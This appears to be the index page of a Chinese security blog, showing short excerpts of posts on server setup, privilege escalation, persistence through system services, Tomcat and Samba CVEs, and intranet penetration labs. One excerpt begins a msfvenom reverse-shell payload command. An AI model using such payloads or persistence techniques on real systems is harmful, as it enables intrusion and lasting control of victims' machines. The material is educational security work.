天道酬勤

网络安全

Windows10快速搭建Tomcat8.5-HackerGu‘s Blog

Windows10快速搭建Tomcat8.5

Gu阅读(3)评论(0)赞(0)

安装 Tomcat,系统必须有 JAVA 环境,这里就不演示如何安装 JAVA 了。 第一步:官网 去官网查看需要下载的版本: https://tomcat.apache.org/ 下载图中框出的版本: 第二步:安置Tomcat 将刚才下载...

权限提升篇-令牌窃取与烂土豆提权-HackerGu‘s Blog

权限提升篇-令牌窃取与烂土豆提权

Gu阅读(1134)评论(0)赞(4)

误区 当前我获得了一个普通域用户权限的shell,利用令牌窃取进行提权,提权到管理员权限。哈哈,提权好简单。胡扯! 看了很多博客,其中几篇文章就这样带有误导性地写,这样不好吧。 访问令牌的定义 描述进程或者线程安全上下文的一个对象。不同的用...

权限维持篇-利用现有服务维权-HackerGu‘s Blog

权限维持篇-利用现有服务维权

Gu阅读(231)评论(0)赞(1)

现有服务权限维持 当攻击者拿到一台机器的shell时,可以通过修改系统上的服务,以达到持久控制。攻击者将恶意软件隐藏在服务执行的位置,修改该服务执行的用户权限,达到获取高权限shell的目的。 在实际的应用中,攻击者通常会操作三个位置来进行...

如何将一篇文章保存为pdf-HackerGu‘s Blog

如何将一篇文章保存为pdf

Gu阅读(165)评论(0)赞(1)

今天也是无意发现了这个方法分享给大家。 首先,你要有WPS,下载链接:WPS官网。 其次,寻找你喜欢的文章。 这篇文章不错,按住Ctrl+P。 一篇文章不就很舒服的保存下来了吗? 另外,有时候会出现字体错乱的情况,那是因为js在捣乱,所以,...

阿里云ECS搭建Web服务-HackerGu‘s Blog

阿里云ECS搭建Web服务

Gu阅读(156)评论(0)赞(3)

一、安装Apache service --status-all 查看当前服务器运行的所有服务 apt-get update 更新一下软件源 apt-get install apache2 安装apache服务 apachectl -v 查看...

CVE-2020-1938-HackerGu‘s Blog

CVE-2020-1938

Gu阅读(359)评论(0)赞(2)

一、Tomcat Apache Tomcat 是一个免费的开源 Web 应用服务器,在中小型企业和个人开发用户中有着广泛的应用。 二、漏洞的影响范围 受影响版本 Apache Tomcat 6 Apache Tomcat 7 < 7....

Samba远程代码执行漏洞(CVE-2017-7494)-HackerGu‘s Blog

Samba远程代码执行漏洞(CVE-2017-7494)

Gu阅读(281)评论(0)赞(1)

Samba远程代码执行漏洞(CVE-2017-7494) 一、漏洞描述 2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4...

Msf和CS上线不出网的机器-HackerGu‘s Blog

Msf和CS上线不出网的机器

Gu阅读(541)评论(0)赞(0)

内网中的很多机器是不可以出网的,那该如何在Msf和CS中上线呢? MSF 我们的目标机器是一台linux服务器,我们先生成elf马。 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=1...

CFS靶机—多层内网渗透靶机-HackerGu‘s Blog

CFS靶机—多层内网渗透靶机

Gu阅读(748)评论(0)赞(2)

  CFS靶机搭建—https://www.anquanke.com/post/id/187908#h2-10 靶机搭建 靶机搭建是我最头疼的地方,下面写一下配置的关键点。 在vm虚拟机中,最为重要的就是这里:虚拟网络编辑器 其中...

专注黑客技术的研究

联系我们联系我们